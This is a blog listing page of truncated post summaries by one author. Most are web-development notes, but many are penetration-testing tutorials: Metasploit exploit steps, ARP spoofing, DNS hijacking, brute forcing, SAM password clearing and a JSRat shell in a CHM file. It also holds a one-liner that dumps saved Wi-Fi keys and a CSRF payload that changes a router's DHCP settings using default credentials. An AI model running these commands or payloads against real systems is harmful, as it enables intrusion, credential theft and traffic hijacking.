摘要:
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的。 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持GUI图形界面(xhydra),不过习惯还是命令好用。 (爆破3389端口终端登录的帐号和密码 协议: 阅读全文
posted @ 2018-01-10 23:43
journeyIT
阅读(63)
评论(0)
推荐(0)
摘要:
ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等 阅读全文
posted @ 2018-01-10 23:40
journeyIT
阅读(278)
评论(0)
推荐(0)
摘要:
MS10-046远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSF Metasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_ico 阅读全文
posted @ 2018-01-10 23:34
journeyIT
阅读(107)
评论(0)
推荐(0)
摘要:
MS12-020远程桌面协议RDP拒绝访问漏洞 条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。 过程:MSF利用 MSF显示为seems down说明目标已经被攻击。如图已经蓝屏。 阅读全文
posted @ 2018-01-10 23:31
journeyIT
阅读(79)
评论(0)
推荐(0)
摘要:
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MS 阅读全文
posted @ 2018-01-10 23:29
journeyIT
阅读(326)
评论(0)
推荐(0)
摘要:
对于用户连接过的wifi,android系统把相关信息明文保存在 /data/misc/wifi/wpa_supplicant.conf中,root之后可以查看,或者利用手机的备份功能进行备份,这样不用root也可以查看。 阅读全文
posted @ 2018-01-10 23:22
journeyIT
阅读(340)
评论(0)
推荐(0)
摘要:
规则01:尽量减少HTTP请求 前端优化的黄金准则指导着前端页面的优化策略:只有10%-20%的最终用户响应时间花在接受请求的HTML文档上,剩下的80%-90%时间花在为HTML文档所引用的所有组件(图片、脚本、样式表等)进行的HTTP请求上。因此,改善响应时间的最简单途径就是减少组件的数量,并由 阅读全文
posted @ 2018-01-10 23:18
journeyIT
阅读(24)
评论(0)
推荐(0)
摘要:
* Ajax的增强操作 * jQuery对Ajax的支持 * 第一组:最基本的用法,最复杂 * $.ajax( url, [setting] )方法 * 第二组: * load( url, [data], [callback] )方法 * $.get( url, [data], [callback] 阅读全文
posted @ 2018-01-10 23:17
journeyIT
阅读(16)
评论(0)
推荐(0)
摘要:
回顾第一天的内容: * Ajax的定义(不严格) * 客户端与服务器端之间进行交互,而无需刷新当前页面。 * 异步与同步: * 同步:客户端向服务器端发送请求,到服务器端进行响应,这个过程中,客户端不能做任何事情。 * 异步:客户端向服务器端发送请求,到服务器端进行响应,这个过程中,客户端可以做任何 阅读全文
posted @ 2018-01-10 23:13
journeyIT
阅读(29)
评论(0)
推荐(0)
摘要:
Ajax: * Ajax概述: * Ajax的原理 * 什么是Ajax * 异步和同步 * 同步: * 客户端页面向服务器端发送请求,直到服务器端将响应发送回来,这个过程中,页面是不能做任何事情。 * 异步: * 客户端页面向服务器端发送请求,直到服务器端将响应发送回来,这个过程中,页面可以去做任何 阅读全文
posted @ 2018-01-10 23:11
journeyIT
阅读(23)
评论(0)
推荐(0)
摘要:
二进制 binary,varbinary,blob 声音、图像等二进制数据 声音和图像的地址保存在表里面 不建议直接将它们保存在表里与字符集无关的如果没有指定是image类型 会当成普通文本显示 会出现乱码凡事文本会有字符集来处理这个文本 非二进制char,varchar,text 字符集utf8 阅读全文
posted @ 2018-01-10 23:05
journeyIT
阅读(25)
评论(0)
推荐(0)
摘要:
show character set; 显示出字符集校对 show variables like "%character%"; show variables like "%collation%"; 显示环境变量 + + + | Variable_name | Value | + + + | char 阅读全文
posted @ 2018-01-10 23:05
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
alter table stu add birday date; 为stu数据库追加birday字段 类型为date类型 update stu set birday="1993/2/24"; 将所有数据的birday字段设置为1993/2/24 update stu set birday="1993 阅读全文
posted @ 2018-01-10 23:04
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
net start mysqld 启动mysql服务 mysql -hIP -uroot -Pport -ppassword 连接数据库 mysql --user root --password 连接数据库 mysql --host localhost --user root --password 阅读全文
posted @ 2018-01-10 23:03
journeyIT
阅读(15)
评论(0)
推荐(0)
摘要:
基本方法扩充 get():下标和length属性 outerWidth():针对隐藏元素和参数true text():合体的特例 remove():detach() $():$(document).ready() get():就是把JQ转成原生的js $('#div1').innerHTML; // 阅读全文
posted @ 2018-01-10 23:01
journeyIT
阅读(9)
评论(0)
推荐(0)
摘要:
选择网页元素 模拟CSS选择元素 $('#div1') //通过id获取元素 $('div') //通过标签获取元素 $('.box') //通过class名获取元素 独有表达式选择 :first 、:last、:eq()、:even、:odd <ul> <li></li> <li title="h 阅读全文
posted @ 2018-01-10 23:00
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
js的API不算太多,不熟悉的分别百度之。讲究的是全局观,没事时候就过过,熟记于心。1.全局对象值属性:NaNInfinityundefined函数属性:evalparseIntparseFloatisNaNisFinite处理URI的函数属性:decodeURIdecodeURIComponent 阅读全文
posted @ 2018-01-10 22:58
journeyIT
阅读(20)
评论(0)
推荐(0)
摘要:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>列表中的导航菜单应用</title> <style type="text 阅读全文
posted @ 2018-01-10 22:57
journeyIT
阅读(29)
评论(0)
推荐(0)
摘要:
注释1:上图整个大背景是这个网页的全部尺寸,中间的小框才是浏览器中的可见尺寸。这幅图就是针对为文档(document)的各个height、width、top、left所做的说明。 注释2:第二幅图主要是针对网页中一个div的各个属性值所做的说明。“DIV element client area”是这 阅读全文
posted @ 2018-01-10 22:56
journeyIT
阅读(37)
评论(0)
推荐(0)
摘要:
Cookie与存储 学习要点: 1.cookie 2.cookie局限性 3.其他存储 随着Web越来越复杂,开发者急切的需要能够本地化存储的脚本功能,这个时候,第一个出现的方案:cookie诞生了。cookie的意图是:在本地的客户端的磁盘上以很小的文件形式保存数据。 一、Cookie cooki 阅读全文
posted @ 2018-01-10 22:55
journeyIT
阅读(30)
评论(0)
推荐(0)
摘要:
错误处理与调试 学习要点: 浏览器错误报告 错误处理 错误事件 错误处理策略 调试技术 调试工具 JavaScript在错误处理调试上一直就是软肋,如果脚本出错,给出的提示经常也让人摸不着头脑。ECMAScript第3版为了解决这个问题引入了try...catch和throw语句以及一些错误类型,让 阅读全文
posted @ 2018-01-10 22:54
journeyIT
阅读(37)
评论(0)
推荐(0)
摘要:
//W3C、IE事件切换器兼容函数 function addEvent(obj , type , fn){ //添加事件兼容 if(obj.addEventListener){ obj.addEventListener(type,fn); }else if(obj.attachEvent){ obj 阅读全文
posted @ 2018-01-10 22:53
journeyIT
阅读(21)
评论(0)
推荐(0)
摘要:
function addEvent(obj , type , fn){ //添加事件兼容 if(obj.addEventListener){ obj.addEventListener(type,fn); }else if(obj.attachEvent){ obj.attachEvent('on' 阅读全文
posted @ 2018-01-10 22:52
journeyIT
阅读(18)
评论(0)
推荐(0)
摘要:
window.onload =function(){ alert('journey'); } if(typeof window.onload == 'function'){ var saved = null; saved = window.onload; } //saved就是window.onlo 阅读全文
posted @ 2018-01-10 22:52
journeyIT
阅读(8)
评论(0)
推荐(0)
摘要:
window.onload=function(){ document.onkeypress=function(event){ alert(getCharCode(event)); } function getCharCode(event){ var e = event || window.event 阅读全文
posted @ 2018-01-10 22:52
journeyIT
阅读(29)
评论(0)
推荐(0)
摘要:
window.onload = function() { function hasClass(element, className) { return !! element.className.match(new RegExp('(\\s|^)' + clssName + '(\\s|$)')); 阅读全文
posted @ 2018-01-10 22:51
journeyIT
阅读(13)
评论(0)
推荐(0)
摘要:
处理表单 学习要点: 1.表单介绍 2.文本框脚本 3.选择框脚本 为了分担服务器处理表单的压力,JavaScript提供了一些解决方案,从而大大打破了处理依赖服务器的局面。 一、表单介绍 在HTML中,表单是由<form>元素来表示的,而在JavaScript中,表单对应的则是HTMLFormEl 阅读全文
posted @ 2018-01-10 22:46
journeyIT
阅读(27)
评论(0)
推荐(0)
摘要:
事件绑定及深入 学习要点: 1.传统事件绑定的问题 2.W3C事件处理函数 3.IE事件处理函数 4.事件对象的其他补充 事件绑定分为两种:一种是传统事件绑定(内联模型,脚本模型),一种是现代事件绑定(DOM2级模型)。现代事 件绑定在传统绑定上提供了更强大更方便的功能。 一、传统事件绑定问题 传统 阅读全文
posted @ 2018-01-10 22:45
journeyIT
阅读(20)
评论(0)
推荐(0)
摘要:
事件对象 学习要点: 1.事件对象 2.鼠标事件 3.键盘事件 4.W3C与IE JavaScript事件的一个重要方面时它们拥有一些相对一致的特点,可以给你的开发提供更强大的功能,最方便和强大的 就是事件对象,它们可以帮你处理鼠标事件和键盘敲击方面的情况,此外还可以修改一般事件的捕获/冒泡流的函数 阅读全文
posted @ 2018-01-10 22:44
journeyIT
阅读(24)
评论(0)
推荐(0)
摘要:
事件入门 学习要点: 1.事件介绍 2.内联模式 3.脚本模式 4.事件处理函数 Javascript事件是由访问Web页面的用户引起的一系列操作,例如:用户点击。当用户执行某些操作的时候,再去执行 一系列代码。 一、事件介绍 事件一般是用于浏览器和用户操作进行交互。最早是IE和Netscap Na 阅读全文
posted @ 2018-01-10 22:43
journeyIT
阅读(21)
评论(0)
推荐(0)
摘要:
DOM元素尺寸和位置 学习要点: 1.获取元素CSS大小 2.获取元素实际大小 3.获取元素周边大小 本章,我们将主要讨论一下页面中的某一个元素它的各种大小和各种位置的计算方式, 以便更好的理解。 一、获取元素的CSS大小 1.通过style内联获取元素的大小 var box = document. 阅读全文
posted @ 2018-01-10 22:42
journeyIT
阅读(31)
评论(0)
推荐(0)
摘要:
动态加载脚本和样式 学习要点: 1.元素位置 2.动态脚本 3.动态样式 本章主要讲解上一章剩余的获取位置的DOM方法,动态加载脚本和样式。 一、元素位置 上一章已经通过几组属性可以获取所需的位置,那么这几课补充一个DOM的方法:getBoundingClientRect()。 这个方法返回一个矩形 阅读全文
posted @ 2018-01-10 22:42
journeyIT
阅读(18)
评论(0)
推荐(0)
摘要:
DOM操作表格及样式 学习要点: 1.操作表格 2.操作样式 DOM在操作生成HTML上,还是比较简明的。不过,由于浏览器总是存在兼容和陷阱,导致最终的操作就不是那么 简单方便了。本章主要了解一下DOM操作表格和样式的一些知识。 一、操作表格 <table>标签是HTML中结构最为复杂的一个,我们可 阅读全文
posted @ 2018-01-10 22:40
journeyIT
阅读(69)
评论(0)
推荐(0)
摘要:
DOM进阶 学习要点: 1.DOM类型 2.DOM扩展 3.DOM操作内容 DOM自身存在很多类型,在DOM基础课程中大部分都有所接触,比如Element类型,表示的是元素节点,再比如 Text类型:表示的是文本节点。DOM也提供了一些扩展功能。 一、DOM类型 DOM基础课程中,我们了解了DOM的 阅读全文
posted @ 2018-01-10 22:39
journeyIT
阅读(13)
评论(0)
推荐(0)
摘要:
DOM 学习要点: 1.DOM介绍 2.查找元素 3.DOM节点 4.节点操作 DOM(Document Object Model)即文档对象模型,针对HTML和XML文档的API(应用程序接口)。DOM 描绘了一个层次化的节点树,运行开发人员添加、移除和修改页面的某一部分。DOM脱胎于Netsca 阅读全文
posted @ 2018-01-10 22:38
journeyIT
阅读(44)
评论(0)
推荐(0)
摘要:
BOM 学习要点: 1.window对象 2.location对象 3.history对象 BOM也叫浏览器对象模型,它提供了很多对象,用于访问浏览器的功能。BOM缺少规范,每个浏览器提供商有按 照自己想法扩展它,那么浏览器共有对象就成了事实的标准,所以,BOM本身是没有标准的或者还没有哪个组织 去 阅读全文
posted @ 2018-01-10 22:37
journeyIT
阅读(9)
评论(0)
推荐(0)
摘要:
浏览器检测 学习要点: 1.navigator对象 2.客户端检测 由于每个浏览器都具有自己独到的扩展,所以在开发阶段来判断浏览器是一个非常重要的步骤。虽然浏览器开发商 在公共接口方面投入了很多精力,努力的去支持最常用的公共功能;但在现实中,浏览器之间的差异,以及不同浏 览器的”怪癖“却是非常多的, 阅读全文
posted @ 2018-01-10 22:37
journeyIT
阅读(34)
评论(0)
推荐(0)
摘要:
匿名函数和闭包 学习要点: 1.匿名函数 2.闭包 匿名函数就是没有名字的函数,闭包是可以访问一个函数作用域里变量的函数。声明:本节内容需要有面向对象和 少量设计模式基础。 一、匿名函数 //普通函数 function box(){ //函数名是box return 'Lee'; } //匿名函数 阅读全文
posted @ 2018-01-10 22:36
journeyIT
阅读(20)
评论(0)
推荐(0)
摘要:
面向对象与原型 学习要点: 1.学习条件 2.创建对象 3.原型 4.继承 ECMAScript有两种开发模式:1.函数式(过程化) 2.面向对象(OOP)。面向对象的语言有一个标志,那就是 类的概念,而通过类可以创建任意多个具有相同属性和方法的对象。但是ECMASxript没有类的概念,因此它的 阅读全文
posted @ 2018-01-10 22:35
journeyIT
阅读(16)
评论(0)
推荐(0)
摘要:
内置对象 学习要点: 1.Global对象 2.Math对象 ECMAScript-262对内置对象的定义是:由ECMAScript实现提供的、不依赖宿主环境的对象。这些对象在ECMAScript 程序执行之前就已经存在了。意思就是说,开发人员不必显示的示例化内置对象,因为它们已经实例化了。ECMA 阅读全文
posted @ 2018-01-10 22:20
journeyIT
阅读(18)
评论(0)
推荐(0)
摘要:
基本包装类型 学习要点: 1.基本包装类型概述 2.Boolean类型 3.Number类型 4.String类型 为了便于操作基本类型值,ECMAScript提供了3中特殊的引用类型:Boolean、Number和String,这些类型与其 它引用类型相似,但同时也具有与各自基本类型相应的特殊行为 阅读全文
posted @ 2018-01-10 22:18
journeyIT
阅读(17)
评论(0)
推荐(0)
摘要:
变量、作用域及内存 学习要点: 1.变量及作用域 2.内存问题 JavaScript的变量与其他语言的变量有很大的区别。Javascript变量时松散型的(不强制类型)本质,决定了它只是 在特定时间用于保存特定值的一个名字而已。由于不存在定义某个变量必须要保存何种数据类型值的规则,变量的 值及其数据 阅读全文
posted @ 2018-01-10 22:17
journeyIT
阅读(19)
评论(0)
推荐(0)
摘要:
Function类型 学习要点: 1.函数的声明方式 2.作为值的函数 3.函数的内部属性 4.函数属性和方法 在ECMAScript中,Function(函数)类型实际上是对象,每个函数都是Function类型的实例,而且都与其他引用 类型一样具有属性和方法。由于函数时对象,因此函数名实际上也是一 阅读全文
posted @ 2018-01-10 22:16
journeyIT
阅读(40)
评论(0)
推荐(0)
摘要:
正则表达式 学习要点: 1.什么事正则表达式 2.创建正则表达式 3.获取控制 4.常用的正则 假设用户需要在HTML表单中填写姓名、地址、出生日期等。那么在将表单提交到服务器进一步处理前,Javascript 程序会检查表单以确认用户输入了信息并且这些信息时符合要求的。 一、什么是正则表达式 正则 阅读全文
posted @ 2018-01-10 22:16
journeyIT
阅读(17)
评论(0)
推荐(0)
摘要:
时间和日期 学习要点: 1.Date类型 2.通用的方法 3.格式化方法 4.组件方法 ECMAScript提供了Date类型来处理事件和日期。Date类型内置一系列获取和设置日期实践心得方法。 一、Date类型 ECMAScript中的Date类型时早起JAVA中的java.util.Date类基 阅读全文
posted @ 2018-01-10 22:15
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
函数 学习要点: 1.函数声明 2.return返回值 3.arguments对象 函数是定义一次但却可以调用或执行任意多次的一段JS代码。函数有时会有参数,即函数被调用时指定了值的局 部变量。函数常常使用这些参数来计算一个返回值,这个值也成为函数调用表达式的值。 一、函数声明 函数对任何语言来说都 阅读全文
posted @ 2018-01-10 22:14
journeyIT
阅读(19)
评论(0)
推荐(0)
摘要:
对象和数组 学习要点: 1.Object类型 2.Array类型 3.对象中的方法 什么是对象,其实就是一种类型,即引用类型。而对象的值就是引用类型的实例。在ECMAScript中引用类型是一 种数据结构,用于将数据和功能组织在一起。它也常被称作为类,但ECMAScript中却没有这种东西。虽然 E 阅读全文
posted @ 2018-01-10 22:14
journeyIT
阅读(22)
评论(0)
推荐(0)
摘要:
流程控制语句 学习要点: 1.语句的定义 2.if语句 3.switch语句 4.do...while语句 5.while语句 6.for语句 7.for...in语句 8.break和continue语句 9.whit语句 ECMAScript-262规定了一组流程控制语句。语句定义了ECMASc 阅读全文
posted @ 2018-01-10 22:13
journeyIT
阅读(19)
评论(0)
推荐(0)
摘要:
运算符 学习要点: 1.什么是表达式 2.一元运算符 3.算术运算符 4.关系运算符 5.逻辑运算符 6.*位运算符 7.赋值运算符 8.其他运算符 9.运算符优先级 ECMAScript-262描述了一组用于操作数据值的运算符,包括一元运算符、布尔运算符、算术 运算符、关系运算符、三元运算符、位运 阅读全文
posted @ 2018-01-10 22:12
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
数据类型 学习要点: 1.typeof操作符 2.Undefined类型 3.Null类型 4.Boolean类型 5.Number类型 6.String类型 7.Object类型 ECMAScript中有5种简单的数据类型:Undefined、Null、Boolean、Number和String。 阅读全文
posted @ 2018-01-10 22:11
journeyIT
阅读(7)
评论(0)
推荐(0)
摘要:
语法、关键保留字及变量 标识符 1.区分大小写:text和Text是两种不同的标识符。 2.标识符组成开头:a(字母)、下划线_、或一个美元符号$ 3.其他字符可以是字母、下划线、美元符号或数字 4.不能把关键字、保留字、true、false、和null作为标识符 例如:myName、book123 阅读全文
posted @ 2018-01-10 22:10
journeyIT
阅读(28)
评论(0)
推荐(0)
摘要:
1、无线网卡 2、KaliLinux操作系统,这里就不用说了,必备的 3、isc-dhcp-server服务器。安装好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可 4、Aircrack-ng套件 #用来发送数据 5、s 阅读全文
posted @ 2018-01-10 19:25
journeyIT
阅读(2506)
评论(0)
推荐(0)
摘要:
建立热点 工具:isc-dhcp-server ;Aircrack-ng套件;iptables 建立过程: 首先写dhcp配置文件/etc/dhcp/dhcpd.conf 写入如下内容: 这里以10.0.0.1作为网关和dns服务器地址。 然后我们处理无线网卡 上述命令可以防止出现:Error: G 阅读全文
posted @ 2018-01-10 19:22
journeyIT
阅读(368)
评论(0)
推荐(1)
摘要:
官网:https://www.wireshark.org/download.html 阅读全文
posted @ 2018-01-10 19:13
journeyIT
阅读(227)
评论(0)
推荐(0)
摘要:
Windows 1.判断什么端口能出来 有时候有防火墙,你也不知道哪个端口能出来,你只有SHELL,咋判断什么端口能出来呢?如果你是在WIN VISTA以下版本,那么用下面的命令可以啦 用TELNET不停的连接你的1-65535端口,你本地开个TCPDUMP就行了,如果连通了,就OK了.如果TCP封 阅读全文
posted @ 2018-01-10 19:08
journeyIT
阅读(2037)
评论(0)
推荐(0)
摘要:
攻击者进行网络钓鱼的方式常有以下几种: 1. 通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现; 2. 通过修改受害者dns来实现; 3. 已经进入路由器,直接修改路由器的DNS。 罗列的并不全,之后遇到的话再补充,上述三种方式很常见。 阅读全文
posted @ 2018-01-10 19:06
journeyIT
阅读(533)
评论(0)
推荐(0)
摘要:
server.py下载地址 https://github.com/breenmachine/dnsftp client.sh脚本 阅读全文
posted @ 2018-01-10 18:58
journeyIT
阅读(441)
评论(0)
推荐(0)
摘要:
nslookup -qt=txt mail._domainkey.mail.vpgame.net 第一个mail 是上面所说的邮件域的selector,_domainkey 是固定格式(DKIM就是基于domainkeys的技术发展而来), mail.vpgame.net 是邮件域 Linux: d 阅读全文
posted @ 2018-01-10 18:53
journeyIT
阅读(408)
评论(0)
推荐(0)
摘要:
–from <要显示的发件人邮箱> –ehlo <伪造的邮件ehlo头> –body <邮件正文> –header <邮件头信息,subject为邮件标题> 阅读全文
posted @ 2018-01-10 18:48
journeyIT
阅读(639)
评论(0)
推荐(0)
摘要:
写了一个style标签import一个css调用:document.writeln('<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1 阅读全文
posted @ 2018-01-10 18:40
journeyIT
阅读(385)
评论(0)
推荐(0)
摘要:
安装 apt-get install steghide steghide --help vim test.txt 输入 journeyIT 1. steghide embed -cf [图片文件载体] -ef [待隐藏文件] 2. [回车] 3. 输入密码,提取文件时用到,如果不想设密码,直接按回车 阅读全文
posted @ 2018-01-10 18:32
journeyIT
阅读(693)
评论(0)
推荐(1)
摘要:
使用交互模式的JSRat server: 访问 http://192.168.1.101:8080/wtf 获取攻击代码如下: 经过多次测试,成功将以上命令写入chm,其Html代码为: 编译以后运行,可以成功获取JS交互shell: 直接执行cmd /c command 是会有黑框的,可以使用ru 阅读全文
posted @ 2018-01-10 18:17
journeyIT
阅读(437)
评论(0)
推荐(0)
摘要:
Haka是一种开源的以网络安全为导向的语言,可以用于编写安全规则和协议剥离器。在这一部分中,我们的重点是编写安全规则。 官网:http://www.haka-security.org/ github:https://github.com/haka-security/haka 阅读全文
posted @ 2018-01-10 18:06
journeyIT
阅读(319)
评论(0)
推荐(0)
摘要:
1. 查看并启动启动apache服务 service apache2 status service apache2 start 2. 修改 /var/www/index.html 页面 vi /var/www/index.html 3. 修改 etter.dns 文件 格式为:劫持的域名 A 指向指 阅读全文
posted @ 2018-01-10 17:49
journeyIT
阅读(559)
评论(0)
推荐(0)
摘要:
Arpspoof -i 网卡 -t 目标IP 网关 Kali : 网卡eth0 目标ip :192.168.1.100 网关:192.168.1.1 替换掉: arpspoof -i eth0 -t 192.168.100 192.168.1.1 怎么看局域网当中的ip呢 Fping -asg 19 阅读全文
posted @ 2018-01-10 17:48
journeyIT
阅读(808)
评论(0)
推荐(0)
摘要:
1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mine IP】 5. set SRVPORT 【80】 6. set URIPATH / 7. exploit -j 8. et 阅读全文
posted @ 2018-01-10 17:47
journeyIT
阅读(416)
评论(0)
推荐(0)
摘要:
1. 打开 The Social-Engineer Toolkit 也就是所谓set 2. 依次选择 Social-Engineering Attacks Website Attacks Vectors Java Applet Attack Method Site Cloner 翻一下:社会工程学攻 阅读全文
posted @ 2018-01-10 17:47
journeyIT
阅读(847)
评论(0)
推荐(0)
摘要:
search autopwn use server/browser_autopwn show options set LHOST set SRVPORT set URIPATH / show options 修改 etter.conf 文件 if you use ipchains if you us 阅读全文
posted @ 2018-01-10 17:46
journeyIT
阅读(112)
评论(0)
推荐(0)
摘要:
search mysql use scanner/mysql/mysql_login show options set RHOSTS set USER_FILE /root/username.lst set PASS_FILE /root/passwords.lst exploit mysql -h 阅读全文
posted @ 2018-01-10 17:44
journeyIT
阅读(387)
评论(0)
推荐(0)
摘要:
cd /mnt/windows/Windows/System32/config/ cd /mnt/windows/Windows/System32/config/ ls SAM chntpw -l SAM chntpw -u "username" SAM 1 - clear 阅读全文
posted @ 2018-01-10 17:43
journeyIT
阅读(381)
评论(0)
推荐(0)
摘要:
一、注释掉系统不需要的用户和用户组 注意:不建议直接删除,当你需要某个用户时,自己重新添加会很麻烦。cp /etc/passwd /etc/passwdbak #修改之前先备份vi /etc/passwd #编辑用户,在前面加上#注释掉此行#adm:x:3:4:adm:/var/adm:/sbin/ 阅读全文
posted @ 2018-01-10 17:40
journeyIT
阅读(373)
评论(0)
推荐(0)
摘要:
mkdir -p /var/lib/pgsql/data //创建pgsql的数据库目录cd /var/lib/pgsql chown postgres.postgres data //改变目录的所属用户用组su postgres //切换到postgres,不然初始化不initdb /var/li 阅读全文
posted @ 2018-01-10 17:39
journeyIT
阅读(3634)
评论(0)
推荐(0)
摘要:
一、安装 首先,安装PostgreSQL客户端。 sudo apt-get install postgresql-client 然后,安装PostgreSQL服务器。 sudo apt-get install postgresql 正常情况下,安装完成后,PostgreSQL服务器会自动在本机的54 阅读全文
posted @ 2018-01-10 17:38
journeyIT
阅读(223)
评论(0)
推荐(0)
摘要:
1、把U盘插入电脑;2、fdisk -l /dev/sda* (查询U盘设备如:sda1)3、mkdir /mnt/usb4、mount /dev/sda1 /mnt/usb5、ls /mnt/usb退出U盘:umount /mnt/usb 阅读全文
posted @ 2018-01-10 17:33
journeyIT
阅读(204)
评论(0)
推荐(0)
摘要:
在grub.conf中的kernel那行的后面,要在同一行,加上vga=ask,保存退出,启动时系统会问你需要什么分辨率的,有一大串选择。不同色彩和分辨率所对应的值depth 640x480 800x600 1024x768 1280x10248bit 769 771 773 77515bit 78 阅读全文
posted @ 2018-01-10 17:32
journeyIT
阅读(662)
评论(0)
推荐(0)
摘要:
系统是什么版本?cat /etc/issuecat /etc/*-releasecat /etc/lsb-releasecat /etc/redhat-release它的内核版本是什么?cat /proc/version uname -auname -mrsrpm -q kerneldmesg | 阅读全文
posted @ 2018-01-10 17:31
journeyIT
阅读(253)
评论(0)
推荐(0)
摘要:
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 阅读全文
posted @ 2018-01-10 17:18
journeyIT
阅读(675)
评论(0)
推荐(0)
摘要:
一、新建一个maven项目,勾上mysql与mybatis 2、把pom.xml的自动生成的原插件替换以下 <!--原插件--> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boo 阅读全文
posted @ 2018-01-10 11:33
journeyIT
阅读(44)
评论(0)
推荐(0)
摘要:
首先你得下载ssh整合包,可以去官网下,也可以直接下载我上传的http://download.csdn.net/detail/h295928126/9777633 然后也给出这个基础项目的完整demo,不过希望的是你能自己动手搭建起来,因为写的很详细了,所以资源下载设置1分 http://downl 阅读全文
posted @ 2018-01-10 11:26
journeyIT
阅读(32)
评论(0)
推荐(0)
摘要:
最进在做网站的后台管理功能,需要能够对数据库的文章进行“增,删,改,查”,但是遇到了图片保存的问题,如果采用前端上传图片至后端,然后后端保存,数据库存储图片的相对路径,这种方式感觉有点麻烦,于是就在寻求更简单的解决方案,那么有没有一种前端上传图片存储,直接返回图片外链的解决方案呢? 最终,我选择 阅读全文
posted @ 2018-01-10 11:14
journeyIT
阅读(54)
评论(0)
推荐(0)
摘要:
Vue2.0+ElementUI+PageHelper实现的表格分页 前言 最近做了一些前端的项目,要对表格进行一些分页显示。表格分页的方法有很多,从宏观上来说分为物理分页和逻辑分页,由于逻辑分页(即前端分页)的做法是将数据全部缓存,然后分页显示,这样在数据量较大的时候会对浏览器的速度产生影响,所以 阅读全文
posted @ 2018-01-10 11:04
journeyIT
阅读(27)
评论(0)
推荐(0)
摘要:
前后端分离 Spring Booot + Vue 开发单页面应用 前言 需求: 最近本人在学习SpringBoot,希望自己能搭一个简单的Demo应用出来,但是搭到前端的时候遇到了困惑,因为网络上大部分教程前端都是应用模板引擎thymeleaf生成的,它给我的感觉就是一个进化版的JSP,但是很明显这 阅读全文
posted @ 2018-01-10 10:54
journeyIT
阅读(145)
评论(0)
推荐(0)
摘要:
这篇文章主要讲解使用eclipse对Spirng+SpringMVC+Maven+Mybatis+MySQL项目搭建过程,包括里面步骤和里面的配置文件如何配置等等都会详细说明。 1、创建表,并插入数据: CREATE TABLE `t_user` ( `USER_ID` int(11) NOT NU 阅读全文
posted @ 2018-01-10 10:09
journeyIT
阅读(22)
评论(0)
推荐(0)
摘要:
配置文件 pom包就不贴了比较简单该依赖的就依赖,主要是数据库这边的配置: mybatis.config-locations=classpath:mybatis/mybatis-config.xml spring.datasource.test1.driverClassName = com.mysq 阅读全文
posted @ 2018-01-10 09:55
journeyIT
阅读(9)
评论(0)
推荐(0)
摘要:
学习任务目标 用户必须要登陆之后才能访问定义链接,否则跳转到登录页面。 对链接进行权限控制,只有当当前登录用户有这个链接访问权限才可以访问,否则跳转到指定页面。 输入错误密码用户名或则用户被设置为静止登录,返回相应json串信息。 我是用的是之前搭建的一个springboot+mybatisplus 阅读全文
posted @ 2018-01-10 08:56
journeyIT
阅读(26)
评论(0)
推荐(1)
浙公网安备 33010602011771号